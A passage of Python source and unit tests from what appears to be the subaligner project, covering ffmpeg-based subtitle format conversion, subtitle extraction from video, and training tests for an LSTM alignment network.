command = "{0} -y -sub_charenc {1} -i {2} -f webvtt {3}".format(Utils.FFMPEG_BIN, encoding, srt_file_path, _vtt_file_path)
timeout_msg = "Timeout on converting SubRip to WebVTT: {}".format(srt_file_path)
error_msg = "Cannot convert SubRip to WebVTT: {}".format(srt_file_path)
def _callback(returncode: int, std_err: str) -> None:
if returncode != 0:
raise TerminalException(
"Cannot convert SubRip to WebVTT: {} with error {}".format(
srt_file_path, std_err
)
)
Utils.remove_trailing_newlines(_vtt_file_path, encoding)
Utils.__run_command(command, timeout_secs, timeout_msg, error_msg, _callback)
@staticmethod
def vtt2srt(vtt_file_path: str, srt_file_path: Optional[str] = None, timeout_secs: int = 30) -> None:
"""Convert WebVTT subtitles to SubRip subtitles.
Arguments:
vtt_file_path {string} -- The path to the WebVTT file.
srt_file_path {string} -- The path to the SubRip file.
timeout_secs {int} -- The timeout in seconds on conversion {default: 30}.
"""
_srt_file_path = vtt_file_path.replace(".vtt", ".srt") if srt_file_path is None else srt_file_path
encoding = Utils.detect_encoding(vtt_file_path)
command = "{0} -y -sub_charenc {1} -i {2} -f srt {3}".format(Utils.FFMPEG_BIN, encoding, vtt_file_path, _srt_file_path)
timeout_msg = "Timeout on converting WebVTT to SubRip: {}".format(vtt_file_path)
error_msg = "Cannot convert WebVTT to SubRip: {}".format(vtt_file_path)
def _callback(returncode: int, std_err: str) -> None:
if returncode != 0:
raise TerminalException(
"Cannot convert WebVTT to SubRip: {} with error {}".format(
vtt_file_path, std_err
)
)
Utils.remove_trailing_newlines(_srt_file_path, encoding)
Utils.__run_command(command, timeout_secs, timeout_msg, error_msg, _callback)
@staticmethod
def srt2ass(srt_file_path: str, ass_file_path: Optional[str] = None) -> None:
"""Convert SubRip subtitles to Advanced SubStation Alpha v4.0+ subtitles.
Arguments:
srt_file_path {string} -- The path to the SubRip file.
ass_file_path {string} -- The path to the ASS file.
"""
new_ass_file_path, encoding = Utils.__convert_subtitle(srt_file_path, "srt", ass_file_path, "ass", "ass")
Utils.remove_trailing_newlines(new_ass_file_path, encoding)
@staticmethod
def ass2srt(ass_file_path: str, srt_file_path: Optional[str] = None) -> None:
"""Convert Advanced SubStation Alpha v4.0+ subtitles to SubRip subtitles.
Arguments:
ass_file_path {string} -- The path to the ASS file.
srt_file_path {string} -- The path to the SubRip file.
"""
new_srt_file_path, encoding = Utils.__convert_subtitle(ass_file_path, "ass", srt_file_path, "srt", "srt")
Utils.remove_trailing_newlines(new_srt_file_path, encoding)
@staticmethod
def srt2ssa(srt_file_path: str, ssa_file_path: Optional[str] = None) -> None:
"""Convert SubRip subtitles to SubStation Alpha v4.0 subtitles.
Arguments:
srt_file_path {string} -- The path to the SubRip file.
ssa_file_path {string} -- The path to the SSA file.
"""
new_ssa_file_path, encoding = Utils.__convert_subtitle(srt_file_path, "srt", ssa_file_path, "ssa", "ssa")
Utils.remove_trailing_newlines(new_ssa_file_path, encoding)
@staticmethod
def ssa2srt(ssa_file_path: str, srt_file_path: Optional[str] = None) -> None:
"""Convert SubStation Alpha v4.0 subtitles to SubRip subtitles.
Arguments:
ssa_file_path {string} -- The path to the SSA file.
srt_file_path {string} -- The path to the SubRip file.
"""
new_srt_file_path, encoding = Utils.__convert_subtitle(ssa_file_path, "ssa", srt_file_path, "srt", "srt")
Utils.remove_trailing_newlines(new_srt_file_path, encoding)
@staticmethod
def srt2microdvd(srt_file_path: str, microdvd_file_path: Optional[str] = None, frame_rate: float = 25.0):
"""Convert SubRip subtitles to MicroDVD subtitles.
Arguments:
srt_file_path {string} -- The path to the SubRip file.
microdvd_file_path {string} -- The path to the MicroDVD file.
frame_rate {float} -- The frame rate for frame-based MicroDVD.
"""
new_microdvd_file_path, encoding = Utils.__convert_subtitle(srt_file_path, "srt", microdvd_file_path, "sub", "microdvd", frame_rate=frame_rate)
Utils.remove_trailing_newlines(new_microdvd_file_path, encoding)
@staticmethod
def microdvd2srt(microdvd_file_path: str, srt_file_path: Optional[str] = None) -> None:
"""Convert MicroDVD subtitles to SubRip subtitles.
Arguments:
microdvd_file_path {string} -- The path to the MPL2 file.
srt_file_path {string} -- The path to the SubRip file.
"""
new_srt_file_path, encoding = Utils.__convert_subtitle(microdvd_file_path, "sub", srt_file_path, "srt", "srt")
Utils.remove_trailing_newlines(new_srt_file_path, encoding)
@staticmethod
def srt2mpl2(srt_file_path: str, mpl2_file_path: Optional[str] = None) -> None:
"""Convert SubRip subtitles to MPL2 subtitles.
Arguments:
srt_file_path {string} -- The path to the SubRip file.
mpl2_file_path {string} -- The path to the MPL2 file.
"""
new_mpl2_file_path, encoding = Utils.__convert_subtitle(srt_file_path, "srt", mpl2_file_path, "txt", "mpl2")
Utils.remove_trailing_newlines(new_mpl2_file_path, encoding)
@staticmethod
def mpl22srt(mpl2_file_path: str, srt_file_path: Optional[str] = None) -> None:
"""Convert MPL2 subtitles to SubRip subtitles.
Arguments:
mpl2_file_path {string} -- The path to the MPL2 file.
srt_file_path {string} -- The path to the SubRip file.
"""
new_srt_file_path, encoding = Utils.__convert_subtitle(mpl2_file_path, "txt", srt_file_path, "srt", "srt")
Utils.remove_trailing_newlines(new_srt_file_path, encoding)
@staticmethod
def srt2tmp(srt_file_path: str, tmp_file_path: Optional[str] = None) -> None:
"""Convert SubRip subtitles to TMP subtitles.
Arguments:
srt_file_path {string} -- The path to the SubRip file.
tmp_file_path {string} -- The path to the TMP file.
"""
new_tmp_file_path, encoding = Utils.__convert_subtitle(srt_file_path, "srt", tmp_file_path, "tmp", "tmp")
Utils.remove_trailing_newlines(new_tmp_file_path, encoding)
@staticmethod
def tmp2srt(tmp_file_path: str, srt_file_path: Optional[str] = None) -> None:
"""Convert TMP subtitles to SubRip subtitles.
Arguments:
mpl2_file_path {string} -- The path to the TMP file.
tmp_file_path {string} -- The path to the SubRip file.
"""
new_srt_file_path, encoding = Utils.__convert_subtitle(tmp_file_path, "tmp", srt_file_path, "srt", "srt")
Utils.remove_trailing_newlines(new_srt_file_path, encoding)
@staticmethod
def srt2sami(srt_file_path: str, sami_file_path: Optional[str] = None) -> None:
"""Convert SubRip subtitles to SAMI subtitles.
Arguments:
srt_file_path {string} -- The path to the SubRip file.
sami_file_path {string} -- The path to the SAMI file.
"""
file: Union[TextIO, BinaryIO]
converter = CaptionConverter()
encoding = Utils.detect_encoding(srt_file_path)
with open(srt_file_path, "r", encoding=encoding) as file:
converter.read(file.read(), SRTReader())
if sami_file_path is None:
sami_file_path = srt_file_path.replace(".srt", ".smi")
with open(sami_file_path, "wb") as file:
file.write(converter.write(SAMIWriter()).encode(encoding))
@staticmethod
def sami2srt(sami_file_path: str, srt_file_path: Optional[str] = None) -> None:
"""Convert SAMI subtitles to SubRip subtitles.
Arguments:
sami_file_path {string} -- The path to the SAMI file.
srt_file_path {string} -- The path to the SubRip file.
"""
file: Union[TextIO, BinaryIO]
converter = CaptionConverter()
encoding = Utils.detect_encoding(sami_file_path)
with open(sami_file_path, "r", encoding=encoding) as file:
converter.read(file.read(), SAMIReader())
if srt_file_path is None:
srt_file_path = sami_file_path.replace(".smi", ".srt")
with open(srt_file_path, "wb") as file:
file.write(converter.write(SRTWriter()).encode(encoding))
Utils.remove_trailing_newlines(srt_file_path, encoding)
@staticmethod
def stl2srt(stl_file_path: str, srt_file_path: Optional[str] = None) -> None:
"""Convert EBU-STL subtitles to SubRip subtitles.
Arguments:
stl_file_path {string} -- The path to the EBU-STL file.
srt_file_path {string} -- The path to the SubRip file.
"""
encoding = Utils.detect_encoding(stl_file_path)
stl = STL(stl_file_path, True)
if srt_file_path is None:
srt_file_path = stl_file_path.replace(".stl", ".srt")
srt = SRT(srt_file_path)
for sub in stl:
(tci, tco, txt) = sub
srt.write(tci, tco, txt)
srt.file.close()
stl.file.close()
Utils.remove_trailing_newlines(srt_file_path, encoding)
@staticmethod
def extract_teletext_as_subtitle(ts_file_path: str, page_num: int, output_file_path: str, timeout_secs: int = 30) -> None:
"""Extract DVB Teletext from MPEG transport stream files and convert them into the output format.
Arguments:
ts_file_path {string} -- The path to the Transport Stream file.
page_num {int} -- The page number for the Teletext
output_file_path {string} -- The path to the output file.
timeout_secs {int} -- The timeout in seconds on extraction {default: 30}.
"""
command = "{0} -y -fix_sub_duration -txt_page {1} -txt_format text -i {2} {3}".format(Utils.FFMPEG_BIN, page_num, ts_file_path, output_file_path)
timeout_msg = "Timeout on extracting Teletext from transport stream: {} on page: {}".format(ts_file_path, page_num)
error_msg = "Cannot extract Teletext from transport stream: {} on page: {}".format(ts_file_path, page_num)
def _callback(returncode: int, std_err: str) -> None:
if returncode != 0:
raise TerminalException(
"Cannot extract Teletext from transport stream: {} on page: {} with error {}".format(
ts_file_path, page_num, std_err
)
)
Utils.remove_trailing_newlines(output_file_path, None)
Utils.__run_command(command, timeout_secs, timeout_msg, error_msg, _callback)
@staticmethod
def extract_matroska_subtitle(mkv_file_path: str, stream_index: int, output_file_path: str, timeout_secs: int = 30) -> None:
"""Extract subtitles from Matroska files and convert them into the output format.
Arguments:
mkv_file_path {string} -- The path to the Matroska file.
stream_index {int} -- The index of the subtitle stream
output_file_path {string} -- The path to the output file.
timeout_secs {int} -- The timeout in seconds on extraction {default: 30}.
"""
command = "{0} -y -i {1} -map 0:s:{2} {3}".format(Utils.FFMPEG_BIN, mkv_file_path, stream_index, output_file_path)
timeout_msg = "Timeout on extracting the subtitle from file: {} with stream index: {}".format(mkv_file_path, stream_index)
error_msg = "Cannot extract the subtitle from file: {} with stream index: {}".format(mkv_file_path, stream_index)
def _callback(returncode: int, std_err: str) -> None:
if returncode != 0:
raise TerminalException(
"Cannot extract the subtitle from file: {} with stream index: {} with error {}".format(
mkv_file_path, stream_index, std_err
)
)
Utils.remove_trailing_newlines(output_file_path, None)
Utils.__run_command(command, timeout_secs, timeout_msg, error_msg, _callback)
@staticmethod
def suppress_lib_logs() -> None:
import os
import logging
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"
os.environ["TF_CPP_MIN_VLOG_LEVEL"] = "0"
logging.getLogger("tensorflow").disabled = True
@staticmethod
def remove_trailing_newlines(source_file_path: str, encoding: Optional[str], target_file_path: Optional[str] = None) -> None:
with open(source_file_path, "r", encoding=encoding) as file:
content = file.read()
if target_file_path is not None:
with open(target_file_path, "w", encoding=encoding) as file:
file.write(content.rstrip())
else:
with open(source_file_path, "w", encoding=encoding) as file:
file.write(content.rstrip())
@staticmethod
def download_file(remote_file_url: str, local_file_path: str) -> None:
r = requests.get(remote_file_url, verify=True, stream=True)
r.raw.decode_content = True
with open(local_file_path, "wb") as file:
shutil.copyfileobj(r.raw, file)
@staticmethod
def contains_embedded_subtitles(video_file_path: str, timeout_secs: int = 30) -> bool:
"""Detect if the input video contains embedded subtitles.
Arguments:
video_file_path {string} -- The path to the video file.
timeout_secs {int} -- The timeout in seconds on extraction {default: 30}.
Returns:
bool -- True if the video contains embedded subtitles or False otherwise.
"""
command = "{0} -y -i {1} -c copy -map 0:s -f null - -v 0 -hide_banner".format(Utils.FFMPEG_BIN, video_file_path)
timeout_msg = "Timeout on detecting embedded subtitles from file: {}".format(video_file_path)
error_msg = "Embedded subtitle detection failed for file: {}".format(video_file_path)
def _callback(returncode: int, std_err: str) -> bool:
return returncode == 0
return Utils.__run_command(command, timeout_secs, timeout_msg, error_msg, _callback)
@staticmethod
def detect_encoding(subtitle_file_path: str) -> str:
"""Detect the encoding of the subtitle file.
Arguments:
subtitle_file_path {string} -- The path to the subtitle file.
Returns:
string -- The string represent the encoding
"""
with open(subtitle_file_path, "rb") as file:
raw = b"".join(file.readlines())
detected = cchardet.detect(raw)
detected = detected or {}
return detected["encoding"] if "encoding" in detected else None
@staticmethod
def __convert_subtitle(source_file_path: str, source_ext: str, target_file_path: Optional[str], target_ext: str, format: str, frame_rate: Optional[float] = None) -> Tuple[str, str]:
encoding = Utils.detect_encoding(source_file_path)
subs = pysubs2.load(source_file_path, encoding=encoding)
new_target_file_path = source_file_path.replace(".%s" % source_ext, ".%s" % target_ext) if target_file_path is None else target_file_path
if frame_rate is None:
subs.save(new_target_file_path, encoding=encoding, format_=format)
else:
subs.save(new_target_file_path, encoding=encoding, format_=format, fps=frame_rate)
return new_target_file_path, encoding
@staticmethod
def __run_command(command: str, timeout_secs: int, timeout_msg: str, error_msg: str, callback: Callable[[int, str], Any]) -> Any:
with subprocess.Popen(
command.split(),
shell=False,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
universal_newlines=True,
bufsize=1,
) as process:
try:
_, std_err = process.communicate(timeout=timeout_secs)
return callback(process.returncode, std_err)
except subprocess.TimeoutExpired as te:
process.kill()
raise TerminalException(timeout_msg) from te
except Exception as e:
process.kill()
if isinstance(e, TerminalException):
raise e
else:
raise TerminalException(error_msg) from e
finally:
os.system("stty sane")
```
#### File: tests/subaligner/test_media_helper.py
```python
import unittest
import os
import pysrt
import subprocess
from subaligner.exception import TerminalException, NoFrameRateException
from subaligner.media_helper import MediaHelper as Undertest
from mock import patch, Mock
class MediaHelperTests(unittest.TestCase):
def setUp(self):
self.__video_file_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resource/test.mp4"
)
self.__subtitle_file_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resource/test.srt"
)
self.__test_audio_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resource/test.wav"
)
self.__audio_file_path = None
self.__segment_paths = []
def tearDown(self):
if self.__audio_file_path is not None:
os.remove(self.__audio_file_path) if os.path.isfile(
self.__audio_file_path
) else None
if self.__segment_paths is not None:
for segment_path in self.__segment_paths:
os.remove(segment_path) if os.path.isfile(segment_path) else None
def test_extract_audio_wav(self):
self.__audio_file_path = Undertest.extract_audio(
self.__video_file_path, True, 16000
)
self.assertTrue(os.path.isfile(self.__audio_file_path))
def test_extract_audio_aac(self):
self.__audio_file_path = Undertest.extract_audio(self.__video_file_path)
self.assertTrue(os.path.isfile(self.__audio_file_path))
def test_extract_audio_wav_from_start(self):
self.__audio_file_path = Undertest.extract_audio(
self.__video_file_path, True, 16000
)
segment_path, duration = Undertest.extract_audio_from_start_to_end(
self.__audio_file_path, "00:00:13,750"
)
self.assertTrue(os.path.isfile(segment_path))
self.__segment_paths.append(segment_path)
self.assertIsNone(duration)
def test_get_duration_in_seconds(self):
duration = Undertest.get_duration_in_seconds(
start="02:10:12,222", end="03:12:24,328"
)
self.assertEqual(3732.106, duration)
def test_get_duration_in_seconds_without_start(self):
duration = Undertest.get_duration_in_seconds(start=None, end="01:01:01,100")
self.assertEqual(3661.100, duration)
def test_extract_audio_wav_from_start_to_end(self):
self.__audio_file_path = Undertest.extract_audio(
self.__video_file_path, True, 16000
)
segment_path, duration = Undertest.extract_audio_from_start_to_end(
self.__audio_file_path, "00:00:13,750", "00:00:16,150"
)
self.assertTrue(os.path.isfile(segment_path))
self.__segment_paths.append(segment_path)
self.assertEqual(2.4, duration)
def test_get_audio_segment_starts_and_ends(self):
subs = pysrt.open(self.__subtitle_file_path, encoding="utf-8")
segment_starts, segment_ends, new_subs = Undertest.get_audio_segment_starts_and_ends(
subs
)
self.assertEqual(len(segment_starts), len(segment_ends))
self.assertEqual(len(segment_starts), len(new_subs))
for sub in new_subs:
self.assertIsInstance(sub, pysrt.SubRipFile)
def test_get_frame_rate(self):
self.assertEqual(24.0, Undertest.get_frame_rate(self.__video_file_path))
def test_throw_terminal_exception_on_bad_video(self):
try:
Undertest.extract_audio("bad_video_file_path", True, 16000)
except Exception as e:
self.assertTrue(isinstance(e, TerminalException))
self.assertFalse(os.path.exists("bad_video_file_path.mp4.wav"))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen")
def test_throw_exception_on_extract_audio_with_error_code(self, mock_popen):
mock_popen.returncode.return_value = 1
mock_popen.communicate = Mock()
mock_popen.communicate.return_value = 1
try:
Undertest.extract_audio(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_popen.communicate.called_with(180))
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("Cannot extract audio from video:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=subprocess.TimeoutExpired("", 1.0))
def test_throw_exception_on_extract_audio_timeout(self, mock_communicate):
try:
Undertest.extract_audio(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("Timeout on extracting audio from video:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=KeyboardInterrupt)
def test_throw_exception_on_extract_audio_interrupted(self, mock_communicate):
try:
Undertest.extract_audio(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("interrupted" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=Exception())
def test_throw_exception_on_vtt2srt_exception(self, mock_communicate):
try:
Undertest.extract_audio(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("Cannot extract audio from video:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", return_value=1)
def test_throw_exception_on_extract_partial_audio_with_error_code(self, mock_communicate):
try:
Undertest.extract_audio_from_start_to_end(
self.__test_audio_path, "00:00:13,750", "00:00:16,150"
)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("Cannot clip audio:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=subprocess.TimeoutExpired("", 1.0))
def test_throw_exception_on_extract_partial_audio_timeout(self, mock_communicate):
try:
Undertest.extract_audio_from_start_to_end(
self.__test_audio_path, "00:00:13,750", "00:00:16,150"
)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("Timeout on extracting audio from audio:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=Exception())
def test_throw_exception_on_extract_partial_audio_exception(self, mock_communicate):
try:
Undertest.extract_audio_from_start_to_end(
self.__test_audio_path, "00:00:13,750", "00:00:16,150"
)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("Cannot clip audio:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=KeyboardInterrupt)
def test_throw_exception_on_extract_partial_audio_interrupted(self, mock_communicate):
try:
Undertest.extract_audio_from_start_to_end(
self.__test_audio_path, "00:00:13,750", "00:00:16,150"
)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("interrupted" in str(e))
else:
self.fail("Should have thrown exception")
def test_throw_no_frame_rate_exception_on_audio(self):
try:
Undertest.get_frame_rate(self.__test_audio_path)
except Exception as e:
self.assertTrue(isinstance(e, NoFrameRateException))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", return_value=1)
def test_throw_exception_on_get_frame_rate(self, mock_communicate):
try:
Undertest.get_frame_rate(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, NoFrameRateException))
self.assertTrue("Cannot extract the frame rate from video:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=subprocess.TimeoutExpired("", 1.0))
def test_throw_exception_on_get_frame_rate_timeout(self, mock_communicate):
try:
Undertest.get_frame_rate(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, NoFrameRateException))
self.assertTrue("Timeout on extracting the frame rate from video:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=Exception())
def test_throw_exception_on_get_frame_rate_exception(self, mock_communicate):
try:
Undertest.get_frame_rate(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, NoFrameRateException))
self.assertTrue("Cannot extract the frame rate from video:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=KeyboardInterrupt)
def test_throw_exception_on_get_frame_rate_interrupted(self, mock_communicate):
try:
Undertest.get_frame_rate(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("interrupted" in str(e))
else:
self.fail("Should have thrown exception")
if __name__ == "__main__":
unittest.main()
```
#### File: tests/subaligner/test_network.py
```python
import unittest
import os
import pickle
import shutil
import h5py
import numpy as np
from mock import patch
from tensorflow.keras.models import Model
from subaligner.hyperparameters import Hyperparameters
from subaligner.exception import TerminalException
from subaligner.network import Network as Undertest
class NetworkTests(unittest.TestCase):
def setUp(self):
self.__hyperparameters = Hyperparameters()
self.__hyperparameters.epochs = 1
self.__model_dir = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resource/models/training/model"
)
self.__weights_dir = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resource/models/training/weights"
)
self.__train_data = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resource/train_data"
)
self.__labels = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resource/labels"
)
self.__training_dump = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resource/training_dump.hdf5"
)
self.__resource_tmp = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resource/tmp"
)
if os.path.exists(self.__resource_tmp):
shutil.rmtree(self.__resource_tmp)
os.mkdir(self.__resource_tmp)
def tearDown(self):
for file in os.listdir(self.__model_dir):
os.remove(os.path.join(self.__model_dir, file)) if not file.endswith(
".hdf5"
) else None
shutil.rmtree(self.__resource_tmp)
Undertest.reset()
def test_suppressed_init(self):
self.assertRaises(
AssertionError, Undertest, "guess", (2, 20), "lstm", None, None
)
def test_get_from_model(self):
model_filepath = "{}/{}".format(self.__model_dir, "model.hdf5")
network = Undertest.get_from_model(model_filepath, self.__hyperparameters)
self.assertEqual((2, 20), network.input_shape)
self.assertEqual("unknown", network.n_type)
def test_save_model_and_weights(self):
model_filepath = "{}/{}".format(self.__model_dir, "model.hdf5")
weights_filepath = "{}/{}".format(self.__weights_dir, "weights.hdf5")
Undertest.save_model_and_weights(
model_filepath,
weights_filepath,
"{}/{}".format(self.__resource_tmp, "model_combined.hdf5"),
)
self.assertEqual((2, 20), Undertest.get_from_model(model_filepath, self.__hyperparameters).input_shape)
def test_input_shape(self):
network = Undertest.get_network((2, 20), self.__hyperparameters)
self.assertEqual((2, 20), network.input_shape)
def test_create_lstm_network(self):
network = Undertest.get_network((2, 20), self.__hyperparameters)
self.assertEqual("lstm", network.n_type)
def test_create_bi_lstm_network(self):
self.__hyperparameters.network_type = "bi_lstm"
network = Undertest.get_network((2, 20), self.__hyperparameters)
self.assertEqual("bi_lstm", network.n_type)
def test_create_conv_1d_network(self):
self.__hyperparameters.network_type = "conv_1d"
network = Undertest.get_network((2, 20), self.__hyperparameters)
self.assertEqual("conv_1d", network.n_type)
def test_summary(self):
network = Undertest.get_network((2, 20), self.__hyperparameters)
self.assertTrue(network.summary is None) # Why this is None
def test_get_predictions(self):
network = Undertest.get_from_model("{}/model.hdf5".format(self.__model_dir), self.__hyperparameters)
with open(self.__train_data, "rb") as file:
train_data = pickle.load(file)
self.assertEqual((11431, 1), network.get_predictions(train_data, "{}/weights.hdf5".format(self.__weights_dir)).shape)
def test_load_model_and_weights(self):
network_old = Undertest.get_network((2, 20), self.__hyperparameters)
weights_old = network_old._Network__model.get_weights()
network_new = Undertest.load_model_and_weights("{}/model.hdf5".format(self.__model_dir), "{}/weights.hdf5".format(self.__weights_dir),
self.__hyperparameters)
weights_new = network_new._Network__model.get_weights()
self.assertFalse(np.array_equal(weights_old, weights_new))
def test_fit_lstm_and_get_history(self):
network = Undertest.get_network((2, 20), self.__hyperparameters)
model_filepath = "{}/model.hdf5".format(self.__resource_tmp)
weights_filepath = "{}/weights.hdf5".format(self.__resource_tmp)
with open(self.__train_data, "rb") as file:
train_data = pickle.load(file)
with open(self.__labels, "rb") as file:
labels = pickle.load(file)
val_loss, val_acc = network.fit_and_get_history(
train_data,
labels,
model_filepath,
weights_filepath,
self.__resource_tmp,
"training.log",
False,
)
self.assertEqual(list, type(val_loss))
self.assertEqual(list, type(val_acc))
def test_fit_bi_lstm_and_get_history(self):
self.__hyperparameters.network_type = "bi_lstm"
network = Undertest.get_network((2, 20), self.__hyperparameters)
model_filepath = "{}/model.hdf5".format(self.__resource_tmp)
weights_filepath = "{}/weights.hdf5".format(self.__resource_tmp)
with open(self.__train_data, "rb") as file:
train_data = pickle.load(file)
with open(self.__labels, "rb") as file:
labels = pickle.load(file)
val_loss, val_acc = network.fit_and_get_history(
train_data,
labels,
model_filepath,
weights_filepath,
self.__resource_tmp,
"training.log",
False,
)
self.assertEqual(list, type(val_loss))
self.assertEqual(list, type(val_acc))
def test_resume_and_get_history(self):
self.__hyperparameters.epochs = 2
network = Undertest.get_network((2, 20), self.__hyperparameters)
model_filepath = "{}/model.hdf5".format(self.__resource_tmp)
weights_filepath = "{}/weights.hdf5".format(self.__resource_tmp)
with open(self.__train_data, "rb") as file:
train_data = pickle.load(file)
with open(self.__labels, "rb") as file:
labels = pickle.load(file)
_, _ = network.fit_and_get_history(
train_data,
labels,
model_filepath,
weights_filepath,
self.__resource_tmp,
"{}/training.log".format(self.__resource_tmp),
False,
)
self.__hyperparameters.epochs = 3
val_loss, val_acc = network.fit_and_get_history(
train_data,
labels,
model_filepath,
weights_filepath,
self.__resource_tmp,
"{}/training.log".format(self.__resource_tmp),
True,
)
self.assertEqual(list, type(val_loss))
self.assertEqual(list, type(val_acc))
def test_exception_on_resume_with_no_extra_epochs(self):
self.__hyperparameters.epochs = 2
network = Undertest.get_network((2, 20), self.__hyperparameters)
model_filepath = "{}/model.hdf5".format(self.__resource_tmp)
weights_filepath = "{}/weights.hdf5".format(self.__resource_tmp)
with open(self.__train_data, "rb") as file:
train_data = pickle.load(file)
with open(self.__labels, "rb") as file:
labels = pickle.load(file)
_, _ = network.fit_and_get_history(
train_data,
labels,
model_filepath,
weights_filepath,
self.__resource_tmp,
"{}/training.log".format(self.__resource_tmp),
False,
)
try:
network.fit_and_get_history(
train_data,
labels,
model_filepath,
weights_filepath,
self.__resource_tmp,
"{}/training.log".format(self.__resource_tmp),
True,
)
except Exception as e:
self.assertTrue(isinstance(e, AssertionError))
self.assertEqual("The existing model has been trained for 2 epochs. Make sure the total epochs are larger than 2", str(e))
else:
self.fail("Should have thrown exception")
def test_exception_on_resume_with_no_previous_training_log(self):
self.__hyperparameters.epochs = 2
network = Undertest.get_network((2, 20), self.__hyperparameters)
model_filepath = "{}/model.hdf5".format(self.__resource_tmp)
weights_filepath = "{}/weights.hdf5".format(self.__resource_tmp)
with open(self.__train_data, "rb") as file:
train_data = pickle.load(file)
with open(self.__labels, "rb") as file:
labels = pickle.load(file)
_, _ = network.fit_and_get_history(
train_data,
labels,
model_filepath,
weights_filepath,
self.__resource_tmp,
"{}/training_1.log".format(self.__resource_tmp),
False,
)
try:
network.fit_and_get_history(
train_data,
labels,
model_filepath,
weights_filepath,
self.__resource_tmp,
"{}/training_2.log".format(self.__resource_tmp),
True,
)
except Exception as e:
self.assertTrue(isinstance(e, AssertionError))
self.assertTrue("does not exist and is required by training resumption" in str(e))
else:
self.fail("Should have thrown exception")
def test_fit_with_generator(self):
self.__hyperparameters.epochs = 3
network = Undertest.get_network((2, 20), self.__hyperparameters)
model_filepath = "{}/model.hdf5".format(self.__resource_tmp)
weights_filepath = "{}/weights.hdf5".format(self.__resource_tmp)
with h5py.File(self.__training_dump, "r") as hf:
val_loss, val_acc = network.fit_with_generator(
hf["train_data"],
hf["labels"],
model_filepath,
weights_filepath,
self.__resource_tmp,
"training.log",
False,
)
self.assertEqual(list, type(val_loss))
self.assertEqual(list, type(val_acc))
self.assertTrue(len(val_loss) == self.__hyperparameters.epochs)
self.assertTrue(len(val_acc) == self.__hyperparameters.epochs)
def test_early_stop_with_patience(self):
self.__hyperparameters.epochs = 3
self.__hyperparameters.es_patience = 0
network = Undertest.get_network((2, 20), self.__hyperparameters)
model_filepath = "{}/model.hdf5".format(self.__resource_tmp)
weights_filepath = "{}/weights.hdf5".format(self.__resource_tmp)
with h5py.File(self.__training_dump, "r") as hf:
val_loss, val_acc = network.fit_with_generator(
hf["train_data"],
hf["labels"],
model_filepath,
weights_filepath,
self.__resource_tmp,
"training.log",
False,
)
self.assertEqual(list, type(val_loss))
self.assertEqual(list, type(val_acc))
self.assertTrue(len(val_loss) < self.__hyperparameters.epochs)
self.assertTrue(len(val_acc) < self.__hyperparameters.epochs)
def test_simple_fit(self):
with open(self.__train_data, "rb") as file:
train_data = pickle.load(file)
with open(self.__labels, "rb") as file:
labels = pickle.load(file)
val_loss, val_acc = Undertest.simple_fit(
(2, 20),
train_data,
labels,
self.__hyperparameters,
)
self.assertEqual(list, type(val_loss))
self.assertEqual(list, type(val_acc))
def test_simple_fit_with_generator(self):
self.__hyperparameters.epochs = 3
with h5py.File(self.__training_dump, "r") as hf:
val_loss, val_acc = Undertest.simple_fit_with_generator(
(2, 20),
hf["train_data"],
hf["labels"],
self.__hyperparameters,
)
self.assertEqual(list, type(val_loss))
self.assertEqual(list, type(val_acc))
self.assertTrue(len(val_loss) == self.__hyperparameters.epochs)
self.assertTrue(len(val_acc) == self.__hyperparameters.epochs)
@patch("tensorflow.keras.models.Model.fit", side_effect=KeyboardInterrupt)
def test_throw_exception_on_fit_and_get_history(self, mock_fit):
try:
network = Undertest.get_network((2, 20), self.__hyperparameters)
